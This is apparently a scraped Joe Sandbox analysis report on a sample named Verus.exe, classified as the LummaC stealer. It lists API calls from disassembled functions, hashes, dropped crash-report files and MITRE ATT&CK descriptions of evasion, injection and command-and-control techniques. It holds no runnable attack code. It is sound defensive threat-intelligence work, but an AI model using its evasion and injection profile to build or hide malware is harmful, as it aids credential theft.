Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$Show$Long$MessageSendVisible$DateFormatLocalRectTextTimelstrcpy
String ID: FeyWriter
API String ID: 1597244904-2343840019
Opcode ID: 4303c90b9909de06543845b023dc20c9c22c89fef45a96d7e218c96187c1e57c
Instruction ID: 9dc552160e992c67d2f57cc17e196d970086af91789b874fdac25a3740c50588
Opcode Fuzzy Hash: 4303c90b9909de06543845b023dc20c9c22c89fef45a96d7e218c96187c1e57c
Instruction Fuzzy Hash: 46F030B4A103446BDB14EB749916F6F37E4AF99744F00492EF94687251EB38D804879D

Function 00413260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 004132A0

Part of subcall function 00402A30: std::runtime_error::runtime_error.LIBCPMTD ref: 00402A3E

__CxxThrowException@8.LIBCMT ref: 004132AE

Part of subcall function 00491365: RaiseException.KERNEL32(?,?,00491A41,004024C5,?,?,?,?,00491A41,004024C5,004E76D0,0053A2B8,004024C5,00000000,00000000), ref: 004913A7

Strings

deque<T> too long, xrefs: 00413285

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
String ID: deque<T> too long
API String ID: 212174158-309773918
Opcode ID: 6b3da6593a08bf849e2a849d6dc72a6400ab7b6a3a1e7a3363874ca3b35608b9
Instruction ID: dd135144b85c08e8c81a6df665df816c9458dfe651e0d7c73ab89d70a345c825
Opcode Fuzzy Hash: 6b3da6593a08bf849e2a849d6dc72a6400ab7b6a3a1e7a3363874ca3b35608b9
Instruction Fuzzy Hash: ABF03C71914248ABCB14EFD5D942F9EB7B8FB04724F10466EB411676D1DB786A04CB48

Function 0044D260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004485C0: ShowWindow.USER32(?,00000001), ref: 004485E7
Part of subcall function 004485C0: GetWindowLongW.USER32(?,000000F0), ref: 004485F5
Part of subcall function 004485C0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00448610
Part of subcall function 004485C0: GetWindowLongW.USER32(?,000000F0), ref: 00448618
Part of subcall function 004485C0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 0044862D
Part of subcall function 004485C0: IsWindowVisible.USER32(?), ref: 0044864F
Part of subcall function 004485C0: ShowWindow.USER32(?,00000005), ref: 0044865B
Part of subcall function 004485C0: ShowWindow.USER32(?,00000000), ref: 00448662
Part of subcall function 004485C0: IsWindowVisible.USER32 ref: 0044868D
Part of subcall function 004485C0: ShowWindow.USER32(?,00000005,?,?,00000000), ref: 00448698
Part of subcall function 004485C0: ShowWindow.USER32(?,00000000,?,?,00000000), ref: 004486A1
Part of subcall function 004485C0: GetWindowRect.USER32(?,004EE92C), ref: 004486BE

lstrcpyW.KERNEL32(?,FeyWriter), ref: 0044D28D
SetWindowTextW.USER32(?,?), ref: 0044D29C

Part of subcall function 0045B570: ShowWindow.USER32(?,00000005,?,004EDE74), ref: 0045B5B0
Part of subcall function 0045B570: SendMessageW.USER32(?,00001101,00000000,FFFF0000), ref: 0045B5E7
Part of subcall function 0045B570: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 0045B5FC
Part of subcall function 0045B570: GetLocalTime.KERNEL32(?,?,004EDE74), ref: 0045B627
Part of subcall function 0045B570: GetDateFormatW.KERNEL32(00000400,00000000,?,yyMMdd_,?,00000008), ref: 0045B645

Strings

FeyWriter, xrefs: 0044D283

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$Show$Long$MessageSendVisible$DateFormatLocalRectTextTimelstrcpy
String ID: FeyWriter
API String ID: 1597244904-2343840019
Opcode ID: 1734f9b1760010b9562cfca5d07e5bdf3b7ae115ef423ad4b66ab3547af279d4
Instruction ID: eedbcdcbf3f330669f41bdb86890f8a77a1a29ab8888d2ee5870600cb2d0a304
Opcode Fuzzy Hash: 1734f9b1760010b9562cfca5d07e5bdf3b7ae115ef423ad4b66ab3547af279d4
Instruction Fuzzy Hash: BEF090B0A103006BDB14AB308916F6F33E4AF98744F00492EF94287291EB79D804878D

Function 00490CEC Relevance: 5.1, APIs: 4, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

Part of subcall function 00490B85: IsProcessorFeaturePresent.KERNEL32(0000000C,00490C5B,?,00415D3E), ref: 00490B87

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00415D3E), ref: 00490C96
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00415D3E), ref: 00490CC3

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: AllocHeapVirtual$FeatureFreePresentProcessProcessor
String ID:
API String ID: 4058086966-0
Opcode ID: 92b0fd36027682b9e19294e9f8d05eec7c1d18af59de85c4620e29841220bc83
Instruction ID: e0944f470c8d694c59122c3dd30073a913ef7ee501d3e14d379c24b9fefad08f
Opcode Fuzzy Hash: 92b0fd36027682b9e19294e9f8d05eec7c1d18af59de85c4620e29841220bc83
Instruction Fuzzy Hash: 5A0145392442116FEFB41729BE0CF1B3A69ABE0701F150132F880D23A0DF29CC41AA6D

Function 00477190 Relevance: 5.1, APIs: 4, Instructions: 59stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,74E2F860,?,?,00416C4B,?), ref: 0047719E
lstrlenW.KERNEL32(?,?,00416C4B,?), ref: 004771B5
lstrlenW.KERNEL32(?,?,00416C4B,?), ref: 004771D4

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: a5fa9fddf12a60d22344fa8a6d2a64b951cba1421c99264c0136c7d0e6cb926c
Instruction ID: 7a551c9ba4f15a767bb417d4df60b1f0ec5afaab5f60cc8274ce38534cdb70a7
Opcode Fuzzy Hash: a5fa9fddf12a60d22344fa8a6d2a64b951cba1421c99264c0136c7d0e6cb926c
Instruction Fuzzy Hash: 2D012433119621660A210A7C9A488EF2B98E8D63713D4C767E168C33E0C769E55643AD

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Verus.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Verus.exe_60c2564910af18faa22197385ca3547fdd3431b_6e980beb_4fc4714e-6a46-4c80-b28f-3fd7bfcdd490\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER10AC.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER11A7.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER11E6.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
Verus.exe

Function 00B50E03 Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Function 00B50CB3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Function 00B506F3 Relevance: 1.9, APIs: 1, Instructions: 399
threadCOMMON

Function 004A6509 Relevance: 1.6, APIs: 1, Instructions: 308
memoryCOMMONLIBRARYCODE

Function 00BAA795 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Function 00BA93B3 Relevance: 1.6, APIs: 1, Instructions: 318
memoryCOMMON

Function 00453190 Relevance: 83.2, APIs: 42, Strings: 5, Instructions: 945
windowstringregistryCOMMON

Function 0042A650 Relevance: 82.9, APIs: 10, Strings: 37, Instructions: 641
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre